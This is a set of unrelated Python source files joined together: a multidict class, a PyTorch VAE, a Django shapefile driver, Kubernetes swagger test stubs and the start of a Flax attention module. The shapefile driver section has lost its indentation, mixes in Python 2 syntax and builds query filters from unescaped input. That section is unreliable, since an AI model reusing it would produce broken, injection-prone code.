        # "Arbitrary" is in fact the oldest (FIFO) pair.
        if self._items:
            return self._items.pop(0)
        else:
            raise KeyError("empty multidict")
    def update(self, *args, **kwargs):
        """Update the dictionary from *other*, overwriting existing keys."""
        self._extend(args, kwargs, 'update', self._replace)
    def _replace(self, key, value):
        # Drop all existing values for key, then append: a replaced key
        # therefore moves to the end of the iteration order.
        if key in self:
            del self[key]
        self.add(key, value)
class CIMultiDict(_CIBase, MultiDict):
    """Mutable multidict that upper-cases keys on every write (case-insensitive)."""
    def add(self, key, value):
        """Add the key and value, not overwriting any previous value."""
        super(CIMultiDict, self).add(key.upper(), value)
    def __setitem__(self, key, value):
        super(CIMultiDict, self).__setitem__(key.upper(), value)
    def __delitem__(self, key):
        super(CIMultiDict, self).__delitem__(key.upper())
    def _replace(self, key, value):
        super(CIMultiDict, self)._replace(key.upper(), value)
    def setdefault(self, key, default=None):
        """Return value for key, set value to default if key is not present."""
        key = key.upper()
        return super(CIMultiDict, self).setdefault(key, default)
class _ViewBase(object):
    """Shared plumbing for the key/value/item views: holds the items list."""
    def __init__(self, items):
        # The live (key, value) tuple list of the owning multidict.
        self._items = items
    def __len__(self):
        return len(self._items)
class _ItemsView(_ViewBase):
    """View yielding the (key, value) pairs of a multidict."""

    def __contains__(self, item):
        assert isinstance(item, (tuple, list))
        assert len(item) == 2
        return item in self._items

    def __iter__(self):
        return iter(self._items)

    def __repr__(self):
        body = ', '.join("{!r}: {!r}".format(k, v) for k, v in self._items)
        return '{}({})'.format(self.__class__.__name__, body)
class _ValuesView(_ViewBase):
    """View yielding only the values of a multidict, with set equality."""

    def __contains__(self, value):
        return any(v == value for _, v in self._items)

    def __iter__(self):
        for _, v in self._items:
            yield v

    def __repr__(self):
        body = ', '.join("{!r}".format(v) for _, v in self._items)
        return '{}({})'.format(self.__class__.__name__, body)

    def __eq__(self, other):
        if not isinstance(other, (_ValuesView, set)):
            return NotImplemented
        mine = set(v for _, v in self._items)
        if isinstance(other, _ValuesView):
            other = set(o[1] for o in other._items)
        return mine == other
class _KeysView(_ViewBase):
    """View yielding the keys of a multidict, with set-like operators.

    isCI makes comparisons upper-case string keys from the other operand.
    """

    def __init__(self, items, isCI=False):
        super(_KeysView, self).__init__(items)
        self.isCI = isCI

    def __contains__(self, key):
        return any(k == key for k, _ in self._items)

    def __iter__(self):
        for k, _ in self._items:
            yield k

    def __repr__(self):
        body = ', '.join("{!r}".format(k) for k, _ in self._items)
        return '{}({})'.format(self.__class__.__name__, body)

    @property
    def __keys(self):
        return set(k for k, _ in self._items)

    def __check_other(self, other):
        if not isinstance(other, (_KeysView, set)):
            return NotImplemented
        if isinstance(other, _KeysView):
            other = [o[0] for o in other._items]
        if self.isCI:
            other = [o.upper() if isinstance(o, str) else o
                     for o in other]
        return set(other)

    def isdisjoint(self, other):
        return self.__keys.isdisjoint(self.__check_other(other))

    def __eq__(self, other):
        return self.__keys == self.__check_other(other)

    def __and__(self, other):
        return self.__keys & self.__check_other(other)

    def __or__(self, other):
        return self.__keys | self.__check_other(other)

    def __sub__(self, other):
        return self.__keys - self.__check_other(other)

    def __xor__(self, other):
        return self.__keys ^ self.__check_other(other)
| |
from __future__ import print_function
import torch
import torch.utils.data
import torch.nn as nn
from torch.autograd import Variable
from utils.distributions import log_Bernoulli, log_Normal_diag, log_Normal_standard
from utils.visual_evaluation import plot_histogram
import numpy as np
import math
from scipy.misc import logsumexp
def xavier_init(m):
    """Initialise a linear layer's weights in place with Xavier/Glorot normal noise."""
    scale = math.sqrt(2. / (m.in_features + m.out_features))
    m.weight.data.normal_(0, scale)
class Gate(nn.Module):
    """Elementwise gating layer: multiplies activations by their gate values."""
    def __init__(self):
        super(Gate, self).__init__()

    def forward(self, h, g):
        # Hadamard product of pre-activation h with gate g.
        return h * g
#=======================================================================================================================
class VAE(nn.Module):
    """VAE with gated MLP encoder/decoder and a mixture prior over z.

    The prior p(z) is a uniform mixture of variational posteriors evaluated
    at learned pseudo-inputs: the rows of ``self.means`` (obtained by feeding
    an identity matrix through a bias-free linear layer).
    """

    def __init__(self, args):
        super(VAE, self).__init__()

        self.args = args

        # Model: p(x|z)
        # decoder: p(x | z) -- two gated linear layers, then a Bernoulli mean head
        self.p_x_layers_pre = nn.ModuleList()
        self.p_x_layers_gate = nn.ModuleList()

        self.p_x_layers_pre.append(nn.Linear(self.args.z1_size, 300))
        self.p_x_layers_gate.append(nn.Linear(self.args.z1_size, 300))

        self.p_x_layers_pre.append(nn.Linear(300, 300))
        self.p_x_layers_gate.append(nn.Linear(300, 300))

        self.p_x_mean = nn.Linear(300, int(np.prod(self.args.input_size))) # 784

        # prior: p(z) = 1/K sum_k N(mean_k, var_k)
        # mixture of Gaussians parameters (the pseudo-inputs, "U" in the paper)
        self.means = nn.Linear(self.args.number_components, int(np.prod(self.args.input_size)), bias=False)
        # implementation trick: initialize means and logvars as layers and take input to be identity matrix: I*W = W
        self.idle_input = Variable(torch.eye(self.args.number_components, self.args.number_components))
        if self.args.cuda:
            self.idle_input = self.idle_input.cuda()

        # Variational: q(z|x)
        # encoder: q(z | x) -- two gated linear layers, then mean/logvar heads
        self.q_z_layers_pre = nn.ModuleList()
        self.q_z_layers_gate = nn.ModuleList()

        self.q_z_layers_pre.append(nn.Linear(int(np.prod(self.args.input_size)), 300))
        self.q_z_layers_gate.append(nn.Linear(int(np.prod(self.args.input_size)), 300))

        self.q_z_layers_pre.append(nn.Linear(300, 300))
        self.q_z_layers_gate.append(nn.Linear(300, 300))

        # Bug fix: the width was written with Python 2 backticks (`300`,
        # i.e. repr(300)); nn.Linear needs the int itself.
        self.q_z_mean = nn.Linear(300, self.args.z1_size)
        self.q_z_logvar = nn.Linear(300, self.args.z1_size)

        self.sigmoid = nn.Sigmoid()
        self.Gate = Gate()

        # Xavier initialization (normal)
        for m in self.modules():
            if isinstance(m, nn.Linear):
                xavier_init(m)

    # AUXILIARY METHODS
    def reparameterize(self, mu, logvar):
        """Sample z = mu + std * eps, eps ~ N(0, I) (reparameterization trick)."""
        std = logvar.mul(0.5).exp_()
        if self.args.cuda:
            eps = torch.cuda.FloatTensor(std.size()).normal_()
        else:
            eps = torch.FloatTensor(std.size()).normal_()
        eps = Variable(eps)
        return eps.mul(std).add_(mu)

    def calculate_likelihood(self, X, dir, mode='test', S=5000):
        """Estimate -log p(x) per row of X by importance sampling with S samples.

        A histogram of the per-example likelihoods is written to *dir*
        (note: the parameter shadows the builtin 'dir'; kept for interface
        compatibility). Returns the mean negative log-likelihood.
        """
        # set auxiliary variables for number of training and test sets
        N_test = X.size(0)

        # init list
        likelihood_test = []

        MB = 100

        # Bug fix: integer division -- 'S / MB' is a float on Python 3 and
        # range(R) would raise TypeError.
        if S <= MB:
            R = 1
        else:
            R = S // MB
            S = MB

        for j in range(N_test):
            if j % 100 == 0:
                print('{:.2f}%'.format(j / (1. * N_test) * 100))
            # Take x*
            x_single = X[j].unsqueeze(0)

            a = []
            for r in range(0, R):
                # Repeat it for all training points
                x = x_single.expand(S, x_single.size(1))

                x_mean, x_logvar, z_q, z_q_mean, z_q_logvar = self.forward(x)
                # RE
                RE = log_Bernoulli(x, x_mean, dim=1)
                # KL
                log_p_z = self.log_p_z(z_q)
                log_q_z = log_Normal_diag(z_q, z_q_mean, z_q_logvar, dim=1)
                KL = -(log_p_z - log_q_z)

                a_tmp = (RE - KL)
                a.append( a_tmp.cpu().data.numpy() )

            # calculate max
            a = np.asarray(a)
            a = np.reshape(a, (a.shape[0] * a.shape[1], 1))
            likelihood_x = logsumexp( a )
            likelihood_test.append(likelihood_x - np.log(S))

        likelihood_test = np.array(likelihood_test)

        plot_histogram(-likelihood_test, dir, mode)

        return -np.mean(likelihood_test)

    def calculate_lower_bound(self, X_full):
        """Compute the negative ELBO averaged over X_full in minibatches of 100."""
        # CALCULATE LOWER BOUND:
        lower_bound = 0.
        RE_all = 0.
        KL_all = 0.

        MB = 100

        # Bug fix: integer division so range() receives an int on Python 3.
        for i in range(X_full.size(0) // MB):
            x = X_full[i * MB: (i + 1) * MB].view(-1, np.prod(self.args.input_size))

            # pass through VAE
            x_mean, x_logvar, z_q, z_q_mean, z_q_logvar = self.forward(x)

            # Reconstruction error RE
            RE = log_Bernoulli(x, x_mean)

            # KL Divergence
            log_p_z = self.log_p_z(z_q)
            log_q_z = log_Normal_diag(z_q, z_q_mean, z_q_logvar, dim=1)
            KL = -torch.sum(log_p_z - log_q_z)

            RE_all += RE.cpu().data[0]
            KL_all += KL.cpu().data[0]

            # CALCULATE LOWER-BOUND: RE + KL - ln(N)
            lower_bound += (-RE + KL).cpu().data[0]

        lower_bound = lower_bound / X_full.size(0)

        return lower_bound

    # THE MODEL: VARIATIONAL POSTERIOR
    def q_z(self, x):
        """Encoder: map x to the mean and log-variance of q(z|x)."""
        h0_pre = self.q_z_layers_pre[0](x)
        h0_gate = self.sigmoid(self.q_z_layers_gate[0](x))
        h0 = self.Gate(h0_pre, h0_gate)

        h1_pre = self.q_z_layers_pre[1](h0)
        h1_gate = self.sigmoid(self.q_z_layers_gate[1](h0))
        h1 = self.Gate(h1_pre, h1_gate)

        z_q_mean = self.q_z_mean(h1)
        z_q_logvar = self.q_z_logvar(h1)
        return z_q_mean, z_q_logvar

    # THE MODEL: GENERATIVE DISTRIBUTION
    def p_x(self, z):
        """Decoder: map z to the Bernoulli mean over pixels (logvar unused, 0)."""
        h0_pre = self.p_x_layers_pre[0](z)
        h0_gate = self.sigmoid(self.p_x_layers_gate[0](z))
        h0 = self.Gate(h0_pre, h0_gate)

        h1_pre = self.p_x_layers_pre[1](h0)
        h1_gate = self.sigmoid(self.p_x_layers_gate[1](h0))
        h1 = self.Gate(h1_pre, h1_gate)

        x_mean = self.sigmoid(self.p_x_mean(h1))
        x_logvar = 0.
        return x_mean, x_logvar

    def log_p_z(self, z ):
        """Evaluate the mixture prior log p(z) via a numerically stable log-sum-exp."""
        # z - MB x M
        MB = z.size(0)
        C = self.args.number_components
        M = z.size(1)

        # calculate params ( U in paper )
        X = self.means(self.idle_input)

        # calculate params for given data
        z_p_mean, z_p_logvar = self.q_z(X)  #C x M

        # expand z
        z_expand = z.unsqueeze(1).expand(MB, C, M)
        means = z_p_mean.unsqueeze(0).expand(MB, C, M)
        logvars = z_p_logvar.unsqueeze(0).expand(MB, C, M)

        a = log_Normal_diag( z_expand, means, logvars, dim=2 ).squeeze(2) - math.log(C) # MB x C
        a_max, _ = torch.max(a, 1)  # MB x 1

        # calculte log-sum-exp
        log_p_z = a_max + torch.log(torch.sum(torch.exp(a - a_max.expand(MB, C)), 1)) # MB x 1

        return log_p_z

    # THE MODEL: FORWARD PASS
    def forward(self, x):
        """Encode x, sample z, decode; return (x_mean, x_logvar, z, z_mean, z_logvar)."""
        # z ~ q(z | x)
        z_q_mean, z_q_logvar = self.q_z(x)
        z_q = self.reparameterize(z_q_mean, z_q_logvar)

        # x_mean = p(x|z)
        x_mean, x_logvar = self.p_x(z_q)

        return x_mean, x_logvar, z_q, z_q_mean, z_q_logvar
| |
# from ga_ows.views import wms, wfs
import shutil
import json
from zipfile import ZipFile
import pandas
from django.contrib.gis.geos import Polygon
import os
import sh
from osgeo import osr, ogr
from . import Driver
from pandas import DataFrame
from shapely import wkb
from django.template.defaultfilters import slugify
import re
def ogrfield(elt):
    """Return an OGR-safe ASCII field name derived from *elt* (max 10 chars)."""
    safe = slugify(elt).encode('ascii')
    return re.sub('-', '_', safe)[0:10]
def identity(x):
    """Double-quote string values; stringify everything else."""
    if isinstance(x, basestring):
        return '"' + x + '"'
    return str(x)
# pandas/numpy dtype name -> OGR attribute field type, used when writing features
dtypes = {
    'int64': ogr.OFTInteger,
    'float64': ogr.OFTReal,
    'object': ogr.OFTString,
    'datetime64[ns]': ogr.OFTDateTime
}
# geometry type name (GeoJSON/WKT style) -> OGR geometry enum
geomTypes = {
    'GeometryCollection': ogr.wkbGeometryCollection,
    'LinearRing': ogr.wkbLinearRing,
    'LineString': ogr.wkbLineString,
    'MultiLineString': ogr.wkbMultiLineString,
    'MultiPoint': ogr.wkbMultiPoint,
    'MultiPolygon': ogr.wkbMultiPolygon,
    'Point': ogr.wkbPoint,
    'Polygon': ogr.wkbPolygon
}
def transform(geom, crx):
    """Apply coordinate transformation *crx* to *geom* in place; no-op when crx is falsy."""
    if not crx:
        return geom
    geom.Transform(crx)
    return geom
class ShapefileDriver(Driver):
    @classmethod
    def supports_multiple_layers(cls):
        # A shapefile is a single-layer format.
        return False
    @classmethod
    def supports_configuration(cls):
        # This driver exposes no user-configurable options.
        return False
def ready_data_resource(self, **kwargs):
"""Other keyword args get passed in as a matter of course, like BBOX, time, and elevation, but this basic driver
ignores them"""
slug, srs = super(ShapefileDriver, self).ready_data_resource(**kwargs)
return slug, srs, {
'type': 'shape',
"file": self.cached_basename + '.shp'
}
def clear_cached_files(self):
sh.rm('-f', sh.glob(os.path.join(self.cache_path, '*.shp')))
sh.rm('-f', sh.glob(os.path.join(self.cache_path, '*.shx')))
sh.rm('-f', sh.glob(os.path.join(self.cache_path, '*.dbf')))
sh.rm('-f', sh.glob(os.path.join(self.cache_path, '*.prj')))
def compute_spatial_metadata(self, **kwargs):
"""Other keyword args get passed in as a matter of course, like BBOX, time, and elevation, but this basic driver
ignores them"""
super(ShapefileDriver, self).compute_spatial_metadata(**kwargs)
self.clear_cached_files()
archive = ZipFile(self.cached_basename + self.src_ext)
projection_found = False
for name in archive.namelist():
xtn = name.split('.')[-1].lower()
if xtn in {'shp', 'shx', 'dbf', 'prj'} and "__MACOSX" not in name:
projection_found = projection_found or xtn == 'prj'
with open(self.cached_basename + '.' + xtn, 'wb') as fout:
with archive.open(name) as fin:
chunk = fin.read(65536)
while chunk:
fout.write(chunk)
chunk = fin.read(65536)
if not projection_found:
with open(self.cached_basename + '.prj', 'w') as f:
srs = osr.SpatialReference()
srs.ImportFromEPSG(4326)
f.write(srs.ExportToWkt())
ds = ogr.Open(self.cached_basename + '.shp')
lyr = ds.GetLayerByIndex(0) if 'sublayer' not in kwargs else ds.GetLayerByName(kwargs['sublayer'])
xmin, xmax, ymin, ymax = lyr.GetExtent()
crs = lyr.GetSpatialRef()
self.resource.spatial_metadata.native_srs = crs.ExportToProj4()
e4326 = osr.SpatialReference()
e4326.ImportFromEPSG(4326)
crx = osr.CoordinateTransformation(crs, e4326)
x04326, y04326, _ = crx.TransformPoint(xmin, ymin)
x14326, y14326, _ = crx.TransformPoint(xmax, ymax)
self.resource.spatial_metadata.bounding_box = Polygon.from_bbox((x04326, y04326, x14326, y14326))
self.resource.spatial_metadata.native_bounding_box = Polygon.from_bbox((xmin, ymin, xmax, ymax))
self.resource.spatial_metadata.three_d = False
self.resource.spatial_metadata.save()
self.resource.save()
def get_data_fields(self, **kwargs):
_, _, result = self.ready_data_resource(**kwargs)
ds = ogr.Open(result['file'])
lyr = ds.GetLayerByIndex(0) if 'layer' not in kwargs else ds.GetLayerByName(kwargs['sublayer'])
return [(field.name, field.GetTypeName(), field.width) for field in lyr.schema]
def get_data_for_point(self, wherex, wherey, srs, **kwargs):
result, x1, y1, epsilon = super(ShapefileDriver, self).get_data_for_point(wherex, wherey, srs, **kwargs)
ds = ogr.Open(result['file'])
lyr = ds.GetLayerByIndex(0) if 'sublayer' not in kwargs else ds.GetLayerByName(kwargs['sublayer'])
if epsilon==0:
lyr.SetSpatialFilter(ogr.CreateGeometryFromWkt("POINT({x1} {y1})".format(**locals())))
else:
from django.contrib.gis import geos
wkt = geos.Point(x1,y1).buffer(epsilon).wkt
print wkt
lyr.SetSpatialFilter(ogr.CreateGeometryFromWkt(wkt))
return [f.items() for f in lyr]
def attrquery(self, key, value):
key, op = key.split('__')
op = {
'gt' : ">",
'gte' : ">=",
'lt' : "<",
'lte' : '<=',
'startswith' : 'LIKE',
'endswith' : 'LIKE',
'istartswith' : 'ILIKE',
'iendswith' : 'ILIKE',
'icontains' : "ILIKE",
'contains' : "LIKE",
'in' : 'IN',
'ne' : "<>"
}[op]
value = {
'gt': identity,
'gte': identity,
'lt': identity,
'lte': identity,
'startswith': lambda x : '%' + x,
'endswith': lambda x : x + '%',
'istartswith': lambda x : '%' + x,
'iendswith': lambda x : x + '%',
'icontains': lambda x : '%' + x + '%',
'contains': lambda x: '%' + x + '%',
'in': lambda x: x if isinstance(x, basestring) else '(' + ','.join(identity(a) for a in x) + ')',
'ne': identity
}[op](value)
return ' '.join([key, op, value])
def as_dataframe(self, **kwargs):
"""
Creates a dataframe object for a shapefile's main layer using layer_as_dataframe. This object is cached on disk for
layer use, but the cached copy will only be picked up if the shapefile's mtime is older than the dataframe's mtime.
:param shp: The shapefile
:return:
"""
dfx_path = self.get_filename('dfx')
shp_path = self.get_filename('shp')
if len(kwargs) != 0:
ds = ogr.Open(shp_path)
lyr = ds.GetLayerByIndex(0)
crx=xrc=None
if 'bbox' in kwargs:
minx,miny,maxx,maxy = kwargs['bbox']
if 'srs' in kwargs:
if isinstance(kwargs['srs'], basestring):
s_srs = osr.SpatialReference()
if kwargs['srs'].lower().startswith('epsg:'):
s_srs.ImportFromEPSG(int(kwargs['srs'].split(':')[1]))
else:
s_srs.ImportFromProj4(kwargs['srs'])
else:
s_srs = kwargs['srs']
t_srs = self.resource.srs
if s_srs.ExportToProj4() != t_srs.ExportToProj4():
crx = osr.CoordinateTransformation(s_srs, t_srs)
minx, miny, _ = crx.TransformPoint(minx, miny)
maxx, maxy, _ = crx.TransformPoint(maxx, maxy)
xrc = osr.CoordinateTransformation(t_srs, s_srs)
lyr.SetSpatialFilterRect(minx, miny, maxx, maxy)
elif 'boundary' in kwargs:
boundary = ogr.Geometry(geomTypes[kwargs['boundary_type']], kwargs["boundary"])
lyr.SetSpatialFilter(boundary)
if 'query' in kwargs:
if isinstance(kwargs['query'], basestring):
query = json.loads(kwargs['query'])
else:
query = kwargs['query']
for key, value in query.items():
attrq= self.attrquery(key, value) if '__' in key else key, '='
lyr.SetAttributeFilter(attrq)
start = kwargs['start'] if 'start' in kwargs else 0
count = kwargs['count'] if 'count' in kwargs else len(lyr) - start
records = []
for i in range(start):
lyr.next()
for i in range(count):
f = lyr.next()
if f.geometry():
records.append(dict(fid=i, geometry=wkb.loads(transform(f.geometry(), xrc).ExportToWkb()), **f.items()))
df = DataFrame.from_records(
data=records,
index='fid'
)
if 'sort_by' in kwargs:
df = df.sort_index(by=kwargs['sort_by'])
return df
elif hasattr(self, '_df'):
return self._df
elif os.path.exists(dfx_path) and os.stat(dfx_path).st_mtime >= os.stat(shp_path).st_mtime:
if self.resource.big:
self._df = pandas.read_hdf(dfx_path, 'df')
else:
self._df = pandas.read_pickle(dfx_path)
return self._df
else:
ds = ogr.Open(shp_path)
lyr = ds.GetLayerByIndex(0)
df= DataFrame.from_records(
data=[dict(fid=f.GetFID(), geometry=wkb.loads(f.geometry().ExportToWkb()), **f.items()) for f in lyr if f.geometry()],
index='fid'
)
if self.resource.big:
df.to_hdf(dfx_path, 'df')
else:
df.to_pickle(dfx_path)
self._df = df
return self._df
@classmethod
def from_dataframe(cls, df, shp, srs):
"""Write an dataframe object out as a shapefile"""
drv = ogr.GetDriverByName('ESRI Shapefile')
if os.path.exists(shp):
shutil.rmtree(shp)
os.mkdir(shp)
ds = drv.CreateDataSource(shp)
keys = df.keys()
fieldDefns = [ogr.FieldDefn(ogrfield(name), dtypes[df[name].dtype.name]) for name in keys if name != 'geometry']
geomType = geomTypes[(f for f in df['geometry']).next().type]
l = ds.CreateLayer(
name=os.path.split(shp)[-1],
srs=srs,
geom_type=geomType
)
for f in fieldDefns:
l.CreateField(f)
for i, record in df.iterrows():
feature = ogr.Feature(l.GetLayerDefn())
for field, value in ((k, v) for k, v in record.to_dict().items() if k != 'geometry'):
if isinstance(value, basestring):
value=value.encode('ascii')
feature.SetField(ogrfield(field), value)
feature.SetGeometry(ogr.CreateGeometryFromWkb(record['geometry'].wkb))
l.CreateFeature(feature)
del ds
# Module-level hook: the plugin loader looks up ``driver`` to find this
# module's Driver implementation.
driver = ShapefileDriver
| |
# coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.6.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import kubernetes.client
from kubernetes.client.rest import ApiException
from kubernetes.client.apis.extensions_v1beta1_api import ExtensionsV1beta1Api
class TestExtensionsV1beta1Api(unittest.TestCase):
    """ ExtensionsV1beta1Api unit test stubs

    Auto-generated by swagger-codegen: one ``test_*`` placeholder per API
    operation of the extensions/v1beta1 group. Bodies are intentionally
    ``pass`` until filled in by hand.
    """

    def setUp(self):
        # Fresh API client per test; no server is contacted until a stub
        # actually calls an operation.
        self.api = kubernetes.client.apis.extensions_v1beta1_api.ExtensionsV1beta1Api()

    def tearDown(self):
        pass

    def test_create_namespaced_daemon_set(self):
        """Test case for create_namespaced_daemon_set"""
        pass

    def test_create_namespaced_deployment(self):
        """Test case for create_namespaced_deployment"""
        pass

    def test_create_namespaced_deployment_rollback_rollback(self):
        """Test case for create_namespaced_deployment_rollback_rollback"""
        pass

    def test_create_namespaced_ingress(self):
        """Test case for create_namespaced_ingress"""
        pass

    def test_create_namespaced_network_policy(self):
        """Test case for create_namespaced_network_policy"""
        pass

    def test_create_namespaced_replica_set(self):
        """Test case for create_namespaced_replica_set"""
        pass

    def test_create_pod_security_policy(self):
        """Test case for create_pod_security_policy"""
        pass

    def test_create_third_party_resource(self):
        """Test case for create_third_party_resource"""
        pass

    def test_delete_collection_namespaced_daemon_set(self):
        """Test case for delete_collection_namespaced_daemon_set"""
        pass

    def test_delete_collection_namespaced_deployment(self):
        """Test case for delete_collection_namespaced_deployment"""
        pass

    def test_delete_collection_namespaced_ingress(self):
        """Test case for delete_collection_namespaced_ingress"""
        pass

    def test_delete_collection_namespaced_network_policy(self):
        """Test case for delete_collection_namespaced_network_policy"""
        pass

    def test_delete_collection_namespaced_replica_set(self):
        """Test case for delete_collection_namespaced_replica_set"""
        pass

    def test_delete_collection_pod_security_policy(self):
        """Test case for delete_collection_pod_security_policy"""
        pass

    def test_delete_collection_third_party_resource(self):
        """Test case for delete_collection_third_party_resource"""
        pass

    def test_delete_namespaced_daemon_set(self):
        """Test case for delete_namespaced_daemon_set"""
        pass

    def test_delete_namespaced_deployment(self):
        """Test case for delete_namespaced_deployment"""
        pass

    def test_delete_namespaced_ingress(self):
        """Test case for delete_namespaced_ingress"""
        pass

    def test_delete_namespaced_network_policy(self):
        """Test case for delete_namespaced_network_policy"""
        pass

    def test_delete_namespaced_replica_set(self):
        """Test case for delete_namespaced_replica_set"""
        pass

    def test_delete_pod_security_policy(self):
        """Test case for delete_pod_security_policy"""
        pass

    def test_delete_third_party_resource(self):
        """Test case for delete_third_party_resource"""
        pass

    def test_get_api_resources(self):
        """Test case for get_api_resources"""
        pass

    def test_list_daemon_set_for_all_namespaces(self):
        """Test case for list_daemon_set_for_all_namespaces"""
        pass

    def test_list_deployment_for_all_namespaces(self):
        """Test case for list_deployment_for_all_namespaces"""
        pass

    def test_list_ingress_for_all_namespaces(self):
        """Test case for list_ingress_for_all_namespaces"""
        pass

    def test_list_namespaced_daemon_set(self):
        """Test case for list_namespaced_daemon_set"""
        pass

    def test_list_namespaced_deployment(self):
        """Test case for list_namespaced_deployment"""
        pass

    def test_list_namespaced_ingress(self):
        """Test case for list_namespaced_ingress"""
        pass

    def test_list_namespaced_network_policy(self):
        """Test case for list_namespaced_network_policy"""
        pass

    def test_list_namespaced_replica_set(self):
        """Test case for list_namespaced_replica_set"""
        pass

    def test_list_network_policy_for_all_namespaces(self):
        """Test case for list_network_policy_for_all_namespaces"""
        pass

    def test_list_pod_security_policy(self):
        """Test case for list_pod_security_policy"""
        pass

    def test_list_replica_set_for_all_namespaces(self):
        """Test case for list_replica_set_for_all_namespaces"""
        pass

    def test_list_third_party_resource(self):
        """Test case for list_third_party_resource"""
        pass

    def test_patch_namespaced_daemon_set(self):
        """Test case for patch_namespaced_daemon_set"""
        pass

    def test_patch_namespaced_daemon_set_status(self):
        """Test case for patch_namespaced_daemon_set_status"""
        pass

    def test_patch_namespaced_deployment(self):
        """Test case for patch_namespaced_deployment"""
        pass

    def test_patch_namespaced_deployment_status(self):
        """Test case for patch_namespaced_deployment_status"""
        pass

    def test_patch_namespaced_deployments_scale(self):
        """Test case for patch_namespaced_deployments_scale"""
        pass

    def test_patch_namespaced_ingress(self):
        """Test case for patch_namespaced_ingress"""
        pass

    def test_patch_namespaced_ingress_status(self):
        """Test case for patch_namespaced_ingress_status"""
        pass

    def test_patch_namespaced_network_policy(self):
        """Test case for patch_namespaced_network_policy"""
        pass

    def test_patch_namespaced_replica_set(self):
        """Test case for patch_namespaced_replica_set"""
        pass

    def test_patch_namespaced_replica_set_status(self):
        """Test case for patch_namespaced_replica_set_status"""
        pass

    def test_patch_namespaced_replicasets_scale(self):
        """Test case for patch_namespaced_replicasets_scale"""
        pass

    def test_patch_namespaced_replicationcontrollers_scale(self):
        """Test case for patch_namespaced_replicationcontrollers_scale"""
        pass

    def test_patch_pod_security_policy(self):
        """Test case for patch_pod_security_policy"""
        pass

    def test_patch_third_party_resource(self):
        """Test case for patch_third_party_resource"""
        pass

    def test_read_namespaced_daemon_set(self):
        """Test case for read_namespaced_daemon_set"""
        pass

    def test_read_namespaced_daemon_set_status(self):
        """Test case for read_namespaced_daemon_set_status"""
        pass

    def test_read_namespaced_deployment(self):
        """Test case for read_namespaced_deployment"""
        pass

    def test_read_namespaced_deployment_status(self):
        """Test case for read_namespaced_deployment_status"""
        pass

    def test_read_namespaced_deployments_scale(self):
        """Test case for read_namespaced_deployments_scale"""
        pass

    def test_read_namespaced_ingress(self):
        """Test case for read_namespaced_ingress"""
        pass

    def test_read_namespaced_ingress_status(self):
        """Test case for read_namespaced_ingress_status"""
        pass

    def test_read_namespaced_network_policy(self):
        """Test case for read_namespaced_network_policy"""
        pass

    def test_read_namespaced_replica_set(self):
        """Test case for read_namespaced_replica_set"""
        pass

    def test_read_namespaced_replica_set_status(self):
        """Test case for read_namespaced_replica_set_status"""
        pass

    def test_read_namespaced_replicasets_scale(self):
        """Test case for read_namespaced_replicasets_scale"""
        pass

    def test_read_namespaced_replicationcontrollers_scale(self):
        """Test case for read_namespaced_replicationcontrollers_scale"""
        pass

    def test_read_pod_security_policy(self):
        """Test case for read_pod_security_policy"""
        pass

    def test_read_third_party_resource(self):
        """Test case for read_third_party_resource"""
        pass

    def test_replace_namespaced_daemon_set(self):
        """Test case for replace_namespaced_daemon_set"""
        pass

    def test_replace_namespaced_daemon_set_status(self):
        """Test case for replace_namespaced_daemon_set_status"""
        pass

    def test_replace_namespaced_deployment(self):
        """Test case for replace_namespaced_deployment"""
        pass

    def test_replace_namespaced_deployment_status(self):
        """Test case for replace_namespaced_deployment_status"""
        pass

    def test_replace_namespaced_deployments_scale(self):
        """Test case for replace_namespaced_deployments_scale"""
        pass

    def test_replace_namespaced_ingress(self):
        """Test case for replace_namespaced_ingress"""
        pass

    def test_replace_namespaced_ingress_status(self):
        """Test case for replace_namespaced_ingress_status"""
        pass

    def test_replace_namespaced_network_policy(self):
        """Test case for replace_namespaced_network_policy"""
        pass

    def test_replace_namespaced_replica_set(self):
        """Test case for replace_namespaced_replica_set"""
        pass

    def test_replace_namespaced_replica_set_status(self):
        """Test case for replace_namespaced_replica_set_status"""
        pass

    def test_replace_namespaced_replicasets_scale(self):
        """Test case for replace_namespaced_replicasets_scale"""
        pass

    def test_replace_namespaced_replicationcontrollers_scale(self):
        """Test case for replace_namespaced_replicationcontrollers_scale"""
        pass

    def test_replace_pod_security_policy(self):
        """Test case for replace_pod_security_policy"""
        pass

    def test_replace_third_party_resource(self):
        """Test case for replace_third_party_resource"""
        pass
# Allow running this module directly; unittest discovers the stubs above.
if __name__ == '__main__':
    unittest.main()
| |
# Copyright 2021 Google LLC
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# https://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Core Fast Attention Module for Flax.
This is a fork of:
https://github.com/google-research/google-research/blob/master/performer/fast_attention/jax/fast_attention.py
"""
# pylint: disable=invalid-name, missing-function-docstring, line-too-long
import abc
from collections.abc import Iterable # pylint: disable=g-importing-member
import functools
from absl import logging
import gin
import jax
from jax import lax
from jax import random
import jax.numpy as jnp
import numpy as onp
# Nonlinear mappings encoding different attention kernels.
gin.external_configurable(jnp.cos, 'jcos')
gin.external_configurable(jnp.sin, 'jsin')
gin.external_configurable(jnp.tanh, 'jtanh')
gin.external_configurable(jax.nn.sigmoid, 'jsigmoid')
gin.external_configurable(
lambda x: jax.nn.gelu(x, approximate=False), 'jgelu'
) # Needs to be exact, although might be slower. See https://github.com/google/jax/issues/4428.
gin.external_configurable(lambda x: x * x * (x > 0.0), 'jrequ')
gin.external_configurable(jnp.exp, 'jexp')
gin.external_configurable(lambda x: x, 'jidentity')
gin.external_configurable(
lambda x: (jnp.exp(x)) * (x <= 0.0) + (x + 1.0) * (x > 0.0), 'jshiftedelu'
) # Nonlinearity used in "Transformers are RNNs: Fast Autoregressive Transformers with Linear Attention" (https://arxiv.org/abs/2006.16236).
def nonnegative_softmax_kernel_feature_creator(data,
                                               projection_matrix,
                                               attention_dims_t,
                                               batch_dims_t,
                                               precision,
                                               is_query,
                                               normalize_data=True,
                                               eps=0.0001):
    """Constructs nonnegative kernel features for fast softmax attention.

    Args:
